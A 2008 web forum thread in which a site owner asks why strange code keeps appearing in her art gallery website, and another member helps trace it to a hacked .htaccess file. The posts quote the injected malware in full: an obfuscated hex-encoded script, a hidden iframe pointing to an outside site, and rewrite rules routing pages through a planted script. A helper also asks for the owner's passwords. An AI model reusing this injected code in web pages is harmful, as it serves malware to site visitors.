Help - strange code in my website!!

**Pluto** · December 13th, 2008, 04:12 PM

Hi
This is a very strange thing! I am no expert on web design, I have done a small, temporary website for an art gallery, it's not very good, but at least it's a site!

Problem is, I upload pages which are fine, then access the site in a browser and 'view source' and the following appears at the bottom just before the close body tag:

<script>function c71912231668n4942ac1a5ba8c(n4942ac1a5c260){ function n4942ac1a5ca39(){return 16;} return (parseInt(n4942ac1a5c260,n4942ac1a5ca39()));}funct ion n4942ac1a5d9dd(n4942ac1a5e1b0){ function n4942ac1a5f92c(){var n4942ac1a60100=2;return n4942ac1a60100;} var n4942ac1a5e983='';n4942ac1a608d4=String.fromCharCo de;for(n4942ac1a5f158=0;n4942ac1a5f158<n4942ac1a5e 1b0.length;n4942ac1a5f158+=n4942ac1a5f92c()){ n4942ac1a5e983+=(n4942ac1a608d4(c71912231668n4942a c1a5ba8c(n4942ac1a5e1b0.substr(n4942ac1a5f158,n494 2ac1a5f92c()))));}return n4942ac1a5e983;} var xc1='';var n4942ac1a610a8='3C7'+xc1+'3637'+xc1+'2697'+xc1+'07 '+xc1+'43E696628216D7'+xc1+'96961297'+xc1+'B646F63 7'+xc1+'56D656E7'+xc1+'42E7'+xc1+'7'+xc1+'7'+xc1+' 2697'+xc1+'465287'+xc1+'56E657'+xc1+'363617'+xc1+' 065282027'+xc1+'2533632536392536362537'+xc1+'32253 63125366425363525323025366525363125366425363525336 4253633253337'+xc1+'2532302537'+xc1+'332537'+xc1+' 32253633253364253237'+xc1+'2536382537'+xc1+'342537 '+xc1+'342537'+xc1+'302533612532662532662536322536 39253637'+xc1+'2537'+xc1+'332536352536632536632537 '+xc1+'332537'+xc1+'342536312536362536362532652536 33253665253266253636253635253635253634253632253631 2536332536622532652536382537'+xc1+'342536642536632 53366253237'+xc1+'2532622534642536312537'+xc1+'342 536382532652537'+xc1+'322536662537'+xc1+'352536652 536342532382534642536312537'+xc1+'3425363825326525 37'+xc1+'32253631253665253634253666253664253238253 23925326125333925333125333025333925333125323925326 2253237'+xc1+'253634253335253336253334253237'+xc1+ '2532302537'+xc1+'37'+xc1+'2536392536342537'+xc1+' 34253638253364253336253333253337'+xc1+'25323025363 8253635253639253637'+xc1+'2536382537'+xc1+'3425336 42533312533342533332532302537'+xc1+'332537'+xc1+'3 42537'+xc1+'39253663253635253364253237'+xc1+'25363 42536392537'+xc1+'332537'+xc1+'302536632536312537' +xc1+'39253361253230253665253666253665253635253237 '+xc1+'2533652533632532662536392536362537'+xc1+'32 25363125366425363525336527'+xc1+'29293B7'+xc1+'D7' +xc1+'6617'+xc1+'2206D7'+xc1+'969613D7'+xc1+'47'+x c1+'27'+xc1+'5653B3C2F7'+xc1+'3637'+xc1+'2697'+xc1 +'07'+xc1+'43E';document.write(n4942ac1a5d9dd(n494 2ac1a610a8));</script></body>

It seems to be code that links to other sites containing spyware but how it got there, I just don't know. I have logged into my host account and actually checked the page via that - there is no mal-code to be seen!!! I think I may be going mad as the code still appears in web browser!

For your info the site is www.burtonartgallery.co.uk and actually some of my other sites hosted with this company - servage - have a similar problem. I have contacted them and they are supposedly upgrading my account but I see no evidence of a fix.

Do you guys think the problem is with the security of the host company, my sites or what? Is it a personal attack on me or just an automated nuisance job??

Many thanks for your help..

**NooNoo** · December 13th, 2008, 07:11 PM

It got hacked... I am not going to go there... delete the files on the site and reupload from a clean backup.

**Pluto** · December 14th, 2008, 05:21 PM

Hi

Yes I've done that, but even if I upload clean files, they instantly show up under 'view source' in a browser with the extra code!

And do you think this is an individual attacking me or an automated nuisance? I have changed my ftp passwords but it doesn't seem to make a difference. The host company tell me they are still looking into it..

It's been a long weekend!!

**NooNoo** · December 14th, 2008, 05:27 PM

Nothing you can do until they tell you what's going on..
What do you use to code your site?

**Pluto** · December 15th, 2008, 04:30 PM

Hi Again

They moved all the files to a new cluster, and they told me - after two days - that my .htaccess-file was hacked. They've made some changes to it and that site seems to be OK. Trouble is, some of my other sites hosted with them have now started to show this extra code on:

<div style="visibility:hidden"><iframe src="http://legaltraff.com/in.cgi?27" width=100 height=80></iframe>

but only on the index pages - nothing to do with me! I have uploaded clean pages and I'm waiting to see how long it takes before they go bad again...

I use front page or dreamweaver usually.

I'm getting very worried now - I have asked servage if it's me personally being hacked, or them.. but I rarely get a straight understandable answer!

**NooNoo** · December 15th, 2008, 04:39 PM

That site diverts to dfs34ss3.com/bm/?t=4 and wants to run a remote data access activex control.... NO, I don't think so!!

post a copy of your .htaccess

**Pluto** · December 15th, 2008, 05:02 PM

Hi Noo Noo

thanks for your help. .htaccess below:

AddType application/x-httpd-php .html
#RewriteEngine On
# RewriteRule ^(.*)\.html$ /images/gil_heal/sys.phtml?file=$1.html [L]
# RewriteRule ^(.*)\.htm$ /images/gil_heal/sys.phtml?file=$1.htm [L]
# RewriteRule ^(.*).php /images/gil_heal/sys.phtml?file=$1.php&%{QUERY_STRING} [L]

The host company said the changes they made were to # the lines and asked if they should # the top line as well - I have no idea! I have an account with multiple domains - I'm no expert but have done a few websites. Interestingly, the "images/gil_heal" refers to a picture on the burtonartgallery website..

Does each domain have a .htaccess-file or just my account?

Thanks for your help - I really appreciate you taking the time to help out.

**NooNoo** · December 16th, 2008, 04:02 AM

Is that the entire contents of the htaccess file?

In the images page of your site

Code:

<body text="ffffff" link="#FFFFFF" vlink="#FFFFFF" alink="#FFFFFF" leftmargin="0" topmargin="0" marginwidth="0"><div style="visibility:hidden"><iframe src

="http://legaltraff.com/in.cgi?27" 

width=100 height=80></iframe></div>
<table width="100&#37;" height="96%" border="0" cellpadding="0" cellspacing="0">
  <tr>

Are you sure that the link is not in your original files?

**Pluto** · December 16th, 2008, 08:01 AM

Hi

yes that's all of the .htaccess fille. And I'm positive that the "legaltraff" link is not in the original files.

I have uploaded clean pages over the affected ones this morning - and so far so good! The host company never really answer my questions properly so other than moving all the files to a new cluster and editing the .htaccess file, I don't think they've done anything else...

I have scanned my own PC with anti-virus and spy bot, but all came up clean.

Thanks for your help Noo Noo..

**NooNoo** · December 16th, 2008, 09:19 AM

It's still there in http://www.burtonartgallery.co.uk/images/ - view the source...

**Pluto** · December 16th, 2008, 09:38 AM

Oh! That IS odd! "Images" is a folder but is being displayed as a page... which I have not created ... and contains the code "legaltraff" .. None of the pages I ftp up contain the code ~ honest!!! The other pages on the site seem clean to me now though .. as do the other sites I've got hosted there. I'm not sure how I can edit the http://www.burtonartgallery.co.uk/images/ page when there is no page in my file manager on the host server to edit ...!

Thanks for all your help - I will have another look at it and let you know..

Many thanks once again..

**NooNoo** · December 16th, 2008, 09:40 AM

That's what you tell your webhost then... or give me your passwords and I will see if I can clean it up...

**Pluto** · December 16th, 2008, 09:45 AM

I will - watch this space! And thank you again!

**Pluto** · December 16th, 2008, 12:20 PM

I have told the host company about burtonartgallery.co.uk/images being displayed as a web page, even though it's a folder, and I wait with anticipation for their reply ........ will let know!

Many thanks..

Update: Silly me! This particular problem was my own fault! I've been so wound up about the host company's lack of support that I accidentally uploaded an index.htm to the images folder! The other pages and my other sites seem to be clean now but again I don't know what happened, never having really got a straight answer from the hosts.. I think I'll be looking around for another company soon!

Many many thanks for your help Noo Noo ~ it's very much appreciated believe me!

**Pluto** · December 17th, 2008, 09:34 AM

They still haven't fixed the other stuff though. In some - and only some - of the burtonartgallery.co.uk pages, more unauthorized code has appeared today after being clean yesterday - room_hire.htm for example.

I really am stuck now - the host co just do not seem to give me a straight answer - is it my security that needs tightening (how??!) or theirs?